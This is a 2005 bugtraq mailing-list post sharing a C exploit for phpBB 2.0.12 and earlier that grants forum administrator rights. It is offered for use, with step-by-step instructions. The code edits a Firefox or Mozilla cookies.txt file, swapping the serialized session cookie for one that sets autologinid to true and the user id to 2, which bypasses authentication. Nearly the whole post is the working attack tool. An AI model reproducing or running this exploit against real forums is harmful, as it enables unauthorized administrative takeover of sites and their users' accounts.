[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    phpBB <= 2.0.12 UID Exploit
From:       federico gonzales <elrengo94 () hotmail ! com>
Date:       2005-03-01 4:56:15
Message-ID: 20050301045615.18939.qmail () www ! securityfocus ! com
[Download RAW message or body]



I made this exploit for get admin permissions in forums phpbb2 2.0.12. It requires \
mozilla or firefox installed. The instructions are in the exploit.

Byes

/*
Author: Paisterist
Date: 28-02-05
[N]eo [S]ecurity [T]eam ©

Description: this exploit modify the user id that is in your cookies.txt (Firefox and \
Mozilla) file.  You have to log in the forum, with the autologin option unchecked, \
then you close the navigator and  execute the exploit.
If you have any problem with the exploit, remove all cookies and do all again.

Note: you have to put the exploit in the same directory of cookies.txt.
This exploit overwrite all phpbb cookies that have the user id specified.

I HAVE NOT DISCOVERED THIS VULNERABILITY, I DON'T KNOW WHO HAS DISCOVERED IT.

By Paisterist

http://neosecurityteam.net
http://neosecurityteam.tk

Greetz: Hackzatan, Crashcool, Towner, Daemon21, Wokkko, Maxx, Arcanhell, Alluz.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char** argv[]) {
    FILE *pointer;
    char contenido[10000],
    cookie[91]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22", \
  cookief[9]="%22%3B%7D", cookiec[106],
    cookie_false[92]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D",
                
    *pos;
    int p=0, i=0;
    
    if (argc!=2) {
       printf("Usage: phpbb_exploit.exe user_id\n\n");
       exit(0);
    }
    pointer=fopen("cookies.txt", "r");
    
    if (pointer) {
       fread(contenido, 300, 10, pointer);
       fclose(pointer);
    } else {
           printf("The file can't be open\n");
           exit(0);
    }
    
    strcpy(cookiec, cookie);
    strncat(cookiec, argv[1], 6);
    strcat(cookiec, cookief);
    
    if (pos=strstr(contenido, cookiec)) {
    p=pos - contenido;
        while (i<92) {
              if (cookie_false[i]!=NULL) 
        contenido[p]=cookie_false[i];
        p++;
        i++;
        }
    }
    else {
         printf("The file cookies.txt isn't valid for execute the exploit or the user \
id is incorrect\n");  exit(0);
    }
        
    if (pointer=fopen("cookies.txt", "w")) {
    fputs(contenido, pointer);
    printf("Cookie modified: \n\n%s\n\n", contenido);
    printf("The cookies file has overwriten... looks like the exploit has worked");
    } else printf("\n\nThe file cookies.txt has not write permissions.");
    return 0;
}


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic